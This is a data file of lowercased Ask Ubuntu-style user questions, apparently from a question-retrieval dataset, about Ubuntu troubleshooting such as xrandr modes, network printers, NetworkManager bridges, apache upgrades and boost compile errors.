520006	problem with `` xrander -- addmode '' -command	i have been trying add undetected resolutions for my display with cvt , xrandr -- newmode and xrandr -- addmode -commands , but without success : $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1280 x 1024 , maximum 1280 x 1024 default connected primary 1280x1024+0+0 0mm x 0mm 1280x1024 0.0* 1024x768 0.0 800x600 0.0 640x480 0.0 $ cvt 1680 1050 60 # 1680x1050 59.95 hz ( cvt 1.76ma ) hsync : 65.29 khz ; pclk : 146.25 mhz modeline `` 1680x1050_60.00 '' 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync $ xrandr -- newmode `` 1680x1050_60.00 '' 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync xrandr : failed to get size of gamma for output default $ xrandr -- addmode s-video 1680x1050 xrandr : failed to get size of gamma for output default xrandr : can not find output `` s-video '' $ xrandr -- addmode vga 1680x1050 xrandr : failed to get size of gamma for output default xrandr : can not find output `` vga '' $ xrandr -- addmode default 1680x1050 xrandr : failed to get size of gamma for output default xrandr : can not find mode `` 1680x1050 '' $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1280 x 1024 , maximum 1280 x 1024 default connected primary 1280x1024+0+0 0mm x 0mm 1280x1024 0.0* 1024x768 0.0 800x600 0.0 640x480 0.0 1680x1050_60.00 ( 0x63 ) 146.2mhz h : width 1680 start 1784 end 1960 total 2240 skew 0 clock 65.3khz v : height 1050 start 1053 end 1059 total 1089 clock 60.0hz if i go to `` displays '' , the resolution option i just added is not there . if i reboot it disappears . what am i doing wrong ? i have been following these instructions . my computer : intel d865perl , pentium 4 cpu ( 3 ghz ) , 3 gb ram , and nvidia quadro fx 500/600 graphics card . i have a harddrive with two partitions : one for the xp and one for ubuntu and it 's partitions . my monitor is asus p221w and it is connected to the vga port . solution : i changed my graphics card to gf 6200 , reinstalled , and everythings works just fine , i got the right resolution without installing or updating any drivers .
520008	what is the meaning of the `greeter-export` setting in sound menu ?	if you inspect com.canonical.indicator.sound with dconf you can see there are two settings global-mute greeter-export are they documented anywhere ? what is their precise meaning ?
520010	software center says : `` check your internet connection '' but i do have a connection	i am running ubuntu 14.04 on an acer aspire netbook all was going well until the latest updates . now my wireless connection is very unstable and i have just gone to download k3b writing software from the ubuntu software centre and i keep getting an error saying failed to download package files check your internet connection failed to fetch http : //gb.archive.ubuntu.com/ubuntu/pool/universe/libq/libqapt/libqapt2_2.1.70-0ubuntu4.1_i386.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //gb.archive.ubuntu.com/ubuntu/pool/universe/libq/libqapt/libqapt2-runtime_2.1.70-0ubuntu4.1_i386.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //gb.archive.ubuntu.com/ubuntu/pool/universe/libq/libqapt/qapt-batch_2.1.70-0ubuntu4.1_i386.deb 404 not found [ ip : 91.189.92.200 80 ] i clearly have an internet connection thanks in advance
520011	fresh install of xubuntu on an acer travelmate 2410 , system will not reboot or shutdown	i have an old acer travelmate 2410 laptop , that was running xp . i 've decided to dump xp , and install xubuntu . i did a clean install , and done all the updates that are available . everything is running as it should with the exception of reboot and shutdown . the system will not do either , and it gets stuck . below is what i 've tried so far , and nothing have helped so far . there is no option in the bios to disable booting from lan , or any other pm settings . the system has intel 910gml integrated 3d graphics featuring intel gma 900 i changed grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash '' acpi=force apm=power_off i did sudo gedit /etc/modules and added apm power_off=1 below lp i also changed grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash acpi=force '' i also changed grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash reboot=bios '' i also changed grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash reboot=pci '' i also changed grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash acpi=oldboot '' nothing worked .
520013	ubuntu 14.04 freezes when running project in netbeans 8 with jdk 7	this question seems to be a duplicate but it 's not ! i run ubuntu from a live pendrive only and wanted to test a netbeans project for linux . i have installed oracle 's jdk 7u67 , netbeans 8 . when i tried to run the project , system freezes . now i 'll have to install those softwares again after reboot . i have read from other 's posts that using openjdk/downgrading netbeans to 7.1 wo n't solve my problem on ubuntu 14.04. what are my options ?
520014	to build a tablet as a final yr project	as a student of final yr i want to make a tablet of simple specification but i m not getting how to install any os in it , i read about ubuntu os for tab , can i really install and ubuntu on tab and if yes how ? ? ? please answer..
520018	disable new keyboard shortcut for show desktop	after a recent upgrade of 14.04 , an icon `` show desktop '' appeared in my launcher bar . i removed it with unity tweak tool . a new keyboard shortcut was also setup : super+d now also shows the desktop . this annoying , since pressing super+alt+d in that order is not the same as pressing alt+super+d in that order . the former is erroneously interpreted as super+d on my machine . what i would like to do in a first step is to disable super+d , but i can not find where i can turn this off . here are the stuff i checked : nothing in settings - > keyboard there is something in compizconfig settings manager - > unity - > general , but it is set to < control > < super > d . disabling it does not disable < super > d . i disabled the shortcut in unity tweak tool - > window manager - > keyboard shortcuts - > show desktop gconf-editor - > apps/compiz-1/plugins/showdesktop , i ca n't find anything about keyboard shortcut there dconf-editor - > org/compiz/profiles/unity/plugins/unityshell - > show-desktop-key is disabled how do i disable the newly install < super > d shortcut ?
520021	timetracks that does stats automatically by app titles	hamster is great but is manual which kinda kills the idea for me . is n't there one for linux that logs time automatically bassed on the window in focus ? and draws stats based on that . if it counts workspaces that 's good too . but hamster workspace auto counter works only with kde right ?
520022	updating intel ssd firmware before installing	i have a intel 330 series 180gb ssd drive brought new and lying for 2 years unused . i wanted to update the firmwrae/driver of the ssd before installing operating system . i have a 2mbps cdma internet connection and a fedora 17 install on my present hard drive . how to update ? is it possible downloading a bootable cd for updating firmware ( for intel 330 ) . i have doubts on guid vs mbr ( i have to install windows ) . also guide on how to partition and enabling trim and any tips to prevent ssd developing bad sectors .
520023	do n't turn on radio devices at startup	how can i prevent ubuntu from turning on radio devices at startup ( to prevent any radio emission ) ? i have added `` rfkill block all '' to rc.local . here is the output of hciconfig : hci0 : type br/edr bus : usb bw address : ... ... . acl mtu : 820:8 sco mtu : 255:16 down rx bytes:558 acl:0 sco:0 events:28 errors:0 tx bytes:355 acl:0 sco:0 commands:28 errors:0 if `` rx bytes '' and `` tx bytes '' are not zeros , does it mean that some radio signal was emmited during boot ? lubuntu 14.04 , notebook msi s12 . this notebook has an indicator for bluetooth , but it is switched off ( under ubuntu ) even when the bluetooth device is on . and the key combination for disabling radio devices does n't work too ( fn+f10 ) . how can i make it work ?
520025	no permission to my google drive foldrer	after installing google drive on ubuntu 14.04 , the google drive folder it created does not allow me to put my own files into the folder . in the permissions tab the folders owner is down as root .
520026	samsung m2675fn network printer does not print from ubuntu 12.04	at work we have a samsung m2675fn network printer . this printer works from windows computers . my ubuntu desktop recognizes the printer , but it does not print anything . using cups or the printer settings gui i can delete the printer , add it again , but that does n't help . how can i get ubuntu to use this printer ? update - in reply to : a umar mukthar output from dmesg ( too long for this question ) : pastebin output from lsusb ( although this printer is connected via lan , not usb ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 03ee:5616 mitsumi bus 001 device 004 : id 046d : c05a logitech , inc. optical mouse m90 output from debugging printing problems guide ping 192.168.1.100 ping 192.168.1.100 ( 192.168.1.100 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.100 : icmp_req=1 ttl=64 time=0.778 ms 64 bytes from 192.168.1.100 : icmp_req=2 ttl=64 time=0.432 ms ^c -- - 192.168.1.100 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 999ms rtt min/avg/max/mdev = 0.432/0.605/0.778/0.173 ms john @ ubuntudesktop : ~ $ nmap 192.168.1.100 starting nmap 5.21 ( http : //nmap.org ) at 2014-09-11 16:41 cest nmap scan report for 192.168.1.100 host is up ( 0.022s latency ) . not shown : 994 closed ports port state service 80/tcp open http 515/tcp open printer 631/tcp open ipp 5200/tcp open unknown 9100/tcp open jetdirect 10001/tcp open unknown nmap done : 1 ip address ( 1 host up ) scanned in 2.64 seconds john @ ubuntudesktop : ~ $ /usr/lib/cups/backend/snmp network socket : //192.168.1.100 `` samsung m267x 287x series '' `` samsung m267x 287x series '' `` mfg : samsung ; cmd : spl , urf , fax , fwv , pic , dcu , ext ; mdl : m267x 287x series ; cls : printer ; cid : sa_spl3_bw ; mode : fax3 , scn , spl3 , r000105 ; '' `` '' john @ ubuntudesktop : ~ $ /usr/lib/cups/backend/snmp network socket : //192.168.1.100 `` samsung m267x 287x series '' `` samsung m267x 287x series '' `` mfg : samsung ; cmd : spl , urf , fax , fwv , pic , dcu , ext ; mdl : m267x 287x series ; cls : printer ; cid : sa_spl3_bw ; mode : fax3 , scn , spl3 , r000105 ; '' `` '' john @ ubuntudesktop : ~ $ lpinfo -v network socket network lpd network ipp network https network http network ipps network smb direct hp network ipp14 file cups-pdf : / network dnssd : //samsung % 20m267x % 20287x % 20series % 20 ( sec30cda710e604 ) ._ipp._tcp.local/ network beh direct hpfax network ipp : //192.168.1.100 network socket : //192.168.1.100
520029	calendar for ubuntu	ubuntu 14.04 lts x64 is there a downloadable calendar for ubuntu , which i could fill with deadlines of projects ? not web-based , installation pure to system , not side programs required .
520030	script that ssh to remote host enters pass and executes a command ?	is it possible to make a script that ssh to remote host , enters the passwords to log-in and then executes at least 1 command on the remote machine ?
520031	ubuntu 14.04 on acer travelmate 2410 not playing dvd-rom in vlc	i 've already installed libdvdcss , libdvdread4 and libdvdnav4 and it plays dvd-video and audio cds all nicely . but it still wo n't play dvd-roms . it does n't even ask me if i would like to open/play the dvd-rom at all in any programme when i first insert the disc . this is what it says when i open vlc and try and open the dvd-rom that way : your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///dev/sr0 ' . check the log for details . ( the above is just an error message in vlc but i made it look like code to stand out from the rest of this . ) i 'm completely new to all of this , i only installed ubuntu 14.04 this morning so if someone could explain how to fix it or give me code to put into the terminal i would be forever grateful . thanks in advance !
520033	apache + php5 problem after 12.04.3 to 14.04.i do release upgrade ( server )	i did a 'do-release-upgrade ' most upgrade went fine . but the upgrade from apache 2.2.22 to 2.4.7 went wrong . there seems to be something wrong with the php5 apache module . i get the following error message : apache2 : syntax error on line 203 of /etc/apache2/apache2.conf : syntax error on line 1 of /etc/apache2/mods-enabled/php5.load : can not load /usr/lib/apache2/module /libphp5.so into server : /usr/lib/apache2/modules/libphp5.so : can not open shared object file : no such file or directory action 'configtest ' failed . how to fix this problem ? i 'll hope there is easy way to solve this problem . : )
520034	acer travelmate p645-mg 3g modem dose n't recoginized	i got a new laptop acer travelmate p-645-mg with builtin 3g card . i can see the modem in the dmesg [ 5.550759 ] usb 2-5 : new high-speed usb device number 6 using xhci_hcd [ 5.569075 ] usb 2-5 : new usb device found , idvendor=12d1 , idproduct=1570 [ 5.569076 ] usb 2-5 : new usb device strings : mfr=5 , product=4 , serialnumber=0 [ 5.569078 ] usb 2-5 : product : huawei mobile broadband module [ 5.569079 ] usb 2-5 : manufacturer : huawei technologies co. , ltd. [ 6.434521 ] usb 2-5 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 6.442747 ] usb 2-5 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 6.443201 ] usb 2-5 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 7.589287 ] usb 2-5 : usb disconnect , device number 6 the disconnect line looks very suspicious . but it does n't show up in lsusb lsusb bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 005 : id 1c7a:0603 lightuning technology inc . bus 002 device 004 : id 8087:07dc intel corp . bus 002 device 003 : id 1bcf:2c57 sunplus innovation technology inc . bus 002 device 032 : id 046d : c52b logitech , inc. unifying receiver bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub and as a result i ca n't see it in networkmanager
520035	sometimes i can use super-space to summon gnome-do , other times i ca n't ( 14.4 with classic )	[ i know its kind of a duplicate , but i tried all the others and nothing worked so far ] i have a 14.4. with ( i 'm not sure if its still called like that , but it used to be called : ) the `` classic '' desktop ( or gnome-fallback-session ? [ i know i should really switch to mint.. ? ] ) . before 14.4 . i had no problems summoning gnome-do with super-space . after the update to 14.4. it stopped working : i tried the following things and now sometimes it works , sometimes it does n't . -- > after a reboot it either works always or not at all until the next reboot where the gamble starts again : compizconfig-settings-manager : key to show the dash ... : disabled enable ubuntu unity plugin is obv . not checked , so not sure if this has any effect anyways.. gconf-editor : remove all super-space combos : there was one for something called `` water '' , no idea what that is.. not the healthiest thing for a pc anyways also sometimes mentioned : apps/metacity/global_keybindings/ panel_main_menu and panel_run_dialog ar both set to disabled i read a lot of times i should do this : gconf-editor '' /apps/mutter/general/overlay_key '' - > erase the `` superkey_l '' but there is no /apps/mutter/ nor can i find anything with mutter in there i read somewhere that the problem was that the super-space keycombo for gnome-do did n't persist after reboots , but mine stays super-space without a problem.. there was also something about setting tab-detect to disabled/false in some xml ( ca n't find it at the moment ) . it was allready set to disabled/false so what else could be the problem ? ( ideally without installing any fancy tools ) what info can i provide to narrow down the problem ? ps : i have no intention to ever use the dash/launcher thing , so if i have to break or trash it , cool no problem , i 'd love too !
520036	how to solve the following errow while installing svn for ubuntu	i am getting this error while installing svn in ubuntu 14.04 . how to solve this ? i am not able to reload . sudo service apache2 reload * reloading web server apache2 * * the apache2 configtest failed . not doing anything . output of config test was : ah00526 : syntax error on line 34 of /etc/apache2/sites-enabled/anusha.conf : serveralias only used in < virtualhost > action 'configtest ' failed . the apache error log may have more information .
520037	xbmc live tv setting to `` grab '' network iptv channels	im currently running linux mint 17-qiana cinnamon , and i wanted to test something that later i want to configure in a home media server that i will build . i do n't know if this is the right place to ask this , but i think that any answer here can work for anyone running ubuntu ... the thing is , i have a contract with an internet/phone/tv provider , vodafone 50mb fiber , and their setup currently is a dvr tv box that is only connected to my router , their box gets the channels , and i was wondering if i could somehow get the channels too and view them with xbmc , hence , building an home media server that would be in my network and i could after that do everything ... visit websites , share content with my laptop ... well everythin that a linux computer can do , but it would be connected to my projector so i could watch tv and movies . the thing here is , i 've been looking online and the closest i can get to this is downloading m3u playlists for viewing the channels as if i didnt pay for them , which is n't my plan , since i already pay for the channels , i would like to not have to use their box , and instead connect a computer . i have noticed there is a channel search feature but only certain add-ons support that , first of all , does anyone know which add-ons support that ? second , would this solve the problem ? could the search find these channels ? if this does not solve it , what could do what i want ? would i need to talk to the provider about this ? could they possibly give me access to their m3u playlist ? im technically not infringing anything , i 'm paying for the service and i only want to integrate it with my system , so i dont see a problem , but on the other hand , i dont know much about this live tv stream , and i 'm afraid they might think i want to share this m3u list so people get free tv ( i do n't know if it is even possible ) sorry for the long post but most is for context , if there is anything i can clarify , just ask me to and i will . thanks ,
520038	ca n't install ubuntu on my computer	i have a 16gb usb that i burned the ubuntu 14.04 lts .iso to using rufus on my windows 7 computer . i booted from usb multiple times , changing the usb port , i tried it with uefi and without . my pc is a i7 4790 , gigabyte h97-hd3 , 2 2tb hard drives and 120 gb ssd ( os driver for windows 7 )
520044	unreadable font on gmail since recent updates in chromium	since recent updates in the past two or three days , many of my incoming emails have become unreadable in gmail . specifically : this happens only in chromium ( in gmail ) . if i open the affected emails in firefox gmail , i can read them ok . if i change the zoom , whether larger or smaller , i can read the email . but at 100 % , i can not . the problem started only a couple of days ago ( yesterday , i think ) . not all emails have this problem . i do n't know what separates those that do from those that do n't . the emails render perfectly on both windows 7 ( chrome ) and lubuntu 14.04 ( chromium ) . see the screen-shots : 100 % ( parts of letters , and entire letters , are missing ) : 90 % ( readable , though not entirely clear ) : 110 % ( also readable , though not entirely clear ) : the letters are crystal clear on both windows and lubuntu . presumably , it is something to do with the fonts . but i do n't know even where to begin fixing this readability problem . please help . i 'm using ubuntu 14.04 64-bit , fully updated
520045	how to convert pdf to multiple swf files	i 'm new to ubuntu how do i convert a .pdf file to a number of .swf files ( the number of .swf files depends on the number of pages in the .pdf file ) . thanks in advance
520048	ctrl+alt+f1 shows nothing , xubuntu 14.04.1 , macbookpro11,3 ( retina , nvidia )	ctrl+alt+f1 ( or + f2-f6 ) shows just a black black screen ( on every monitor if there are any externals ) , although ctrl+alt+f7 may bring the desktop back . it 's a xubuntu 14.04.1 on macbookpro11,3 with retina and nvidia graphics . since blank black screen happens a lot when plug/unplug external screens , and ctrl+alt+f1 or f2,3,4,5,6,7 etc . or ctrl+alt+backspace does nothing , i can only power off if this situation happens . is this because the resolution stuff that stop ttys from displaying , maybe ? update : if nvidia driver uninstalled , tty works . when nvidia driver installed again , blank tty again . update : i just reinstall xubuntu again ( not because of this issue ) , the system now is relatively fresh , ctrl+alt+f1 shows nothing ( nvidia v 343 driver installed ) .
520049	looking for historical feature comparison data for the ubuntu project	i am currently writing my master 's thesis about big and succesful open source projects like linux / ubuntu . i am not sure if this is the right place to post this question ( if not , please forgive me and kindly point me to the rigth one ) anyway , i am looking for the `` feature history '' of ubuntu . meaning , do you have a place where i can see the different requirements that you have completed over time , the new features that have been added through the years in different versions , as well as the current ongoing set of features under development ? thank you very much ! and congratulations on sucha a wonderful product that i use every day ! br , juan florez . oulu , finland .
520051	network-manager , bridge and vpn	i have a shiny new system with ubuntu 14.04 and i 'm trying to get something configured which i think is reasonably simple : a bridge ( br0 ) for kvm ability to use a vpn network-manager controlling it all i 've configured my br0 interface and the subinterface but no matter what i do , network-manager does n't like it . it thinks br0 is unmanaged for some reason and never activates the connection . i do like network-manager for the dnsmasq support when using a vpn - this is the only reason i have n't yet turfed it . things i 've tried : enabling ifupdown and putting the configuration into /e/n/i n-m almost works but assigns the /32 route to the default gateway to eth0 instead of br0 putting everything in /e/n/i n-m does n't think there 's a connection , so ca n't use vpn . getting rid of everything except br0 and br0-eth0 ( the subinterface ) configurations n-m still does n't like - again it thinks br0 is unmanaged . adding/removing mac addresses , changing names no help has anyone yet got this working ? /etc/network/interfaces : auto lo iface lo inet loopback ... /system-connections/br0 : [ connection ] id=br0 uuid=f2e53b47-234b-4d24-acf6-2c511ef0696c type=bridge timestamp=1409790457 [ ipv6 ] method=auto [ ipv4 ] method=auto [ bridge ] interface-name=br0 stp=false ... /system-connections/br0-eth0 : [ 802-3-ethernet ] duplex=full [ connection ] id=br0-eth0 uuid=26a2a78b-296b-4dce-9e17-860c13956cb9 type=802-3-ethernet timestamp=1409790457 master=f2e53b47-234b-4d24-acf6-2c511ef0696c slave-type=bridge logs : sep 3 22:59:08 kronos networkmanager [ 4321 ] : < info > auto-activating connection 'br0-eth0 ' . sep 3 22:59:08 kronos networkmanager [ 4321 ] : < debug > [ 1409799548.255597 ] [ nm-manager.c:3026 ] nm_manager_activate_connection ( ) : activation of 'br0-eth0 ' requires master connection 'br0' sep 3 22:59:08 kronos networkmanager [ 4321 ] : < info > connection 'br0-eth0 ' auto-activation failed : ( 1 ) no compatible disconnected device found for master connection f2e53b47-234b-4d24-acf6-2c511ef0696c . sep 3 22:59:08 kronos networkmanager [ 4321 ] : < debug > [ 1409799548.255610 ] [ nm-agent-manager.c:698 ] next_generic ( ) : ( :1.56/org.freedesktop.nm-applet/1000 ) agent saving secrets for request 0x132b220/ ( null ) sep 3 22:59:08 kronos networkmanager [ 4321 ] : < debug > [ 1409799548.256800 ] [ nm-agent-manager.c:1179 ] save_done_cb ( ) : ( :1.56/org.freedesktop.nm-applet/1000 ) agent saved secrets for request 0x132b220/ ( null ) ○ → nmcli d device type state br0 bridge unmanaged eth0 802-3-ethernet disconnected ○ → nmcli c name uuid type timestamp-real br0 f2e53b47-234b-4d24-acf6-2c511ef0696c bridge wed 03 sep 2014 08:27:37 pm edt br0-eth0 26a2a78b-296b-4dce-9e17-860c13956cb9 802-3-ethernet wed 03 sep 2014 08:27:37 pm edt
520054	mysterious key combination causes tmux session to disappear	twice now i have pressed something while in tmux that causes my windows and status bar to disappear . i see the output from the script that started the session , just like a foreground process that has not yet completed ( there is no command prompt ) . all of my keypresses appear immediately as output . things like ^c and my activation chord appear as output instead of having the expected effect . according to ps -ef the processes in those windows are all still running . what mode am i in , what key combination must i be pressing to get to this point , and how do i get out of it without killing the session that is still running ? update : thankfully ^z to background followed by fg restores my session .
520057	fail with su command	can someone help me with this fail , i get it when i run the su command . failed to open connection to `` session '' message bus : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . thanks
520058	use same home partition to install a different ubuntu	{ similar : 1 . keeping the same /home partition after a clean install what should i think about before using one partition as /home for two different systems ? can i use the same home folder on different linux systems ( multiboot ) ? } my question is a bit different . i 've got ubuntu 14.04 installed on my laptop ; however , due to the excess bloat i 've filled my machine with and the resulting slow speed , i am thinking of doing a clean install of bodhi linux . # parted /dev/sda print model : ata st500lt012-1dg14 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 10.2gb 10.2gb primary ext4 boot 2 10.2gb 500gb 490gb extended 5 10.2gb 20.5gb 10.2gb logical linux-swap ( v1 ) 6 20.5gb 400gb 380gb logical ext4 7 400gb 500gb 100gb logical ext4 sda1 is mounted on /boot ; sda5 is swap ; sda6 is /home ; sda7 is / to achieve that , i 'm going to reformat and then mount sda1 ( /boot ) and sda7 ( / ) while mounting sda6 ( /home ) and sda5 ( swap ) directly . what i am concerned with is that configuration files ( like of xsession and such ) present in my /home/username might interfere with the fresh install . to prevent this , should i delete all the hidden files and folder ( none of them are personal ) and then go with fresh install ? can this approach lead to problems ? is there any alternate way to achieve the same purpose ? note : backing up personal files and then pasting them is not an option , i do n't have that big external storage available .
520061	fn keys only partly working - dell inspirion 15	intalled 14.04 lts ono a new dell inspirion 15 . for the function of the fn keys , there are two options in its bios . 1 : without fn key , the multimedia functions are being used 2 : with fn key , the multimedia functions are being used . when i choose option 1 ; all works well however , i would like option 2 . with that option activated , only the keys for screen brightness work , but not the keys for p.e . controlling the sound volume ( or mute the volume ) . how can i get these to work while using option 2 ? thanks
520065	proper installation and upgrade antivirus for ubuntu 14.04 lts	i have a need to examine certain files with antivirus software , before forwarding them to the network before uploading them to the server . which antivirus would you recommend and what is the most proper way to install on ubuntu 14.04 lts ? clamav does not want to because we do not work properly . i 'm thinking about comodo , bitdefender or avast antivirus linux , but i do not know whether they are good , and i do not know how to properly install . i want my antivirus program after i upgraded to the new software version of the repository or through a module to automatically update the entire ubuntu operating system . so , i know that antivirus database updating through their own program , but i 'm concerned about upgrading the software to the new version that is somehow automatic . i apologize for the bad english because i use google translate .
520066	magento : php extension `` curl '' must be loaded	sudo apt-get install php5-curl reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5-curl : depends : php5-common ( = 5.3.10-1ubuntu3 ) but 5.3.10-1ubuntu3.13 is to be installed e : unable to correct problems , you have held broken packages . and sudo apt-get install curl libcurl3 libcurl3-dev php5-curl reading package lists ... done building dependency tree reading state information ... done note , selecting 'libcurl4-openssl-dev ' instead of 'libcurl3-dev' libcurl3 is already the newest version . libcurl3 set to manually installed . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcurl4-openssl-dev : depends : libcurl3 ( = 7.22.0-3ubuntu4 ) but 7.22.0-3ubuntu4.8 is to be installed depends : libkrb5-dev but it is not going to be installed depends : libldap2-dev but it is not going to be installed depends : librtmp-dev but it is not going to be installed depends : libssl-dev but it is not going to be installed php5-curl : depends : php5-common ( = 5.3.10-1ubuntu3 ) but 5.3.10-1ubuntu3.13 is to be installed e : unable to correct problems , you have held broken packages .
520072	run pkill without sudo permission	i want to run pkill like below . sudo pkill -u 11002 i can not give sudo password multiple times , so i want to run pkill without sudo user . for this i copied pkill to home as named bkill , and then i have run the following command . sudo setcap `` cap_kill+epi '' /home/rajesh/bkill this will give kill capabilities to this binary . but whenever i run i am getting following message . /home/rajesh/bkill -u 11002 result : 31270 i check running processes of that user using below command . ps -u 11002 pid tty time cmd 340 pts/26 00:00:00 ncserver this is showing process pid 340 is still running . i assumed cap_kill is not working . so i tried a different approach . i have given sudo access using below commands . sudo chown root /home/rajesh/bkill sudo chmod u+s /home/rajesh/bkill even this way also not working . can anybody help me to resolve this ? ?
520074	problem with installing ubuntu	when i install ubuntu .. first i can not choose anything in the installer just freeze and after that the tab close and say.. the installer encountered an unrecoverable error.. a desktop session will now be run so that you may investigate . the problem or try installing again . i am installing by usb the version 14.04 32 bit please help guys i need help
520075	proplem with dual boot with windows 8	i want to install ubuntu beside my windows 8 but i made a mistake that i installed only ubuntu , but when i logged in ubuntu and went to open my partitions , an error appeared said that `` '' error mounting /dev/sda5 at /media/abdo/mohamed : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/abdo/mohamed '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option '' '' . please i need help here .
520077	installing ubuntu 14.10 beta	i am running ubuntu 13.10 on my laptop . i would like to skip 14.04 lts and install 14.10 beta 1 . i have downloaded the iso image file dated 28th aug. how do i install it ?
520078	gamepad and steering wheel have stopped working	i 've just set them up to work properly , and after one reboot they literally vanished . evtest does n't see them anymore , jstest-gtk is blind too , but lsusb sees them . the devices are xbox 360 wired gamepad and logitech driving force gt . i suppose i could have somehow broken the xpad kernel module : $ lsmod | grep xpad gives me nothing ( though i 've never run this command before so i do n't know what it is supposed to do ) . if i 'm right , then i guess there should be some way to enable it , as i have n't recompiled the kernel yesterday ( well , i 've never ever done it at all ) .
520080	remove the first part of a string using sed	how do i get from this : randomcollege-nt\user90 to this : user90 using sed ?
520085	i installed conky and i have few questions	so i just installed conky , configured it in terminal while it was almost finished . i set location , it 's using the metric system , so it 's really cool . but i have few questions : am i able to use 2 conkys in the same time or set two cities as default ? how often does conky updates itself ? i mean on myweather indicator app i could set 15 or 30 minutes and so on . how does conky manager works ? i installed it hoping that i can customize things like in gnome tweak or something like that but it 's really different . if you ca n't help with the manager then can you tell me the way you configure conky in terminal ? because with my conky theme ( harmattan ) i could/can choose from 4 versions and maybe later i 'd like to change those modes . in the picture you see one of them .
520086	building problem with boost after upgrading ubuntu	i have a code that i can build and everything was working until i decide to upgrade my version of ubuntu for the 14.04 one . now i have this kind of error messages : < boost : :property < boost : :detail : :adj_list_gen < boost : :adjacency_list < boost : :detail : :adj_list_gen < boost : :adjacency_list < boost : :adjacency_list < boost : :adjacency_list < boost : :detail : :adj_list_gen < boost : :adjacency_list < boost : :adjacency_list /usr/include/boost/pending/property.hpp:158:10 : error : ambiguous class template instantiation for `struct boost : :lookup_one_property_internal < boost : :property , boost : :vertex_bundle_t , void > ' struct lookup_one_property : lookup_one_property_internal { } ; ^ in file included from /usr/include/boost/graph/graph_traits.hpp:27:0 , from /usr/include/boost/graph/adjacency_list.hpp:33 , from /home/pouette/paradiseo-2.0/eo/tutorial/templates/casgeneral/src/utils.h:5 , from /home/pouette/paradiseo-2.0/eo/tutorial/templates/casgeneral/src/eocasgeneralinit.h:17 , from /home/pouette/paradiseo-2.0/eo/tutorial/templates/casgeneral/src/casgeneralea.cpp:40 : /usr/include/boost/pending/property.hpp:107:3 : error : candidates are : struct boost : :lookup_one_property_internal bgl_do_one_bundle_type ( vertex ) error : candidates are : struct boost : :lookup_one_property_internal < t , boost : :vertex_bundle_t > ... . /usr/include/boost/pending/property.hpp:107:3 : error : struct boost : :lookup_one_property_internal < boost : :property < tag , t , base > , boost : :vertex_bundle_t > bgl_do_one_bundle_type ( vertex ) ... . from /home/pouette/paradiseo-2.0/eo/tutorial/templates/casgeneral/src/casgeneralea.cpp:40 : /usr/include/boost/pending/property.hpp:114:10 : error : struct boost : :lookup_one_property_internal < boost : :property < tag , t , base > , tag > struct lookup_one_property_internal < boost : :property < tag , t , base > , tag > { ^ /usr/include/boost/pending/property.hpp:127:10 : error : struct boost : :lookup_one_property_internal < boost : :property < tag , t , base > , propname > struct lookup_one_property_internal < boost : :property < tag , t , base > , propname > : lookup_one_property_internal < base , propname > { ^ /usr/include/boost/pending/property.hpp:158:10 : error : invalid use of incomplete type ‘struct boost : :lookup_one_property_internal < boost : :property < boost : :vertex_bundle_t , vertexproperties > , boost : :vertex_bundle_t , void > ’ struct lookup_one_property : lookup_one_property_internal < t , tag > { } ; ^ in file included from /usr/include/boost/graph/graph_traits.hpp:27:0 , from /usr/include/boost/graph/adjacency_list.hpp:33 , from /home/pouette/paradiseo-2.0/eo/tutorial/templates/casgeneral/src/utils.h:5 , from /home/pouette/paradiseo-2.0/eo/tutorial/templates/casgeneral/src/eocasgeneralinit.h:17 , from /home/pouette/paradiseo-2.0/eo/tutorial/templates/casgeneral/src/casgeneralea.cpp:40 : /usr/include/boost/pending/property.hpp:58:10 : error : declaration of ‘struct boost : :lookup_one_property_internal < boost : :property < boost : :vertex_bundle_t , vertexproperties > , boost : :vertex_bundle_t , void > ’ struct lookup_one_property_internal { boost_static_constant ( bool 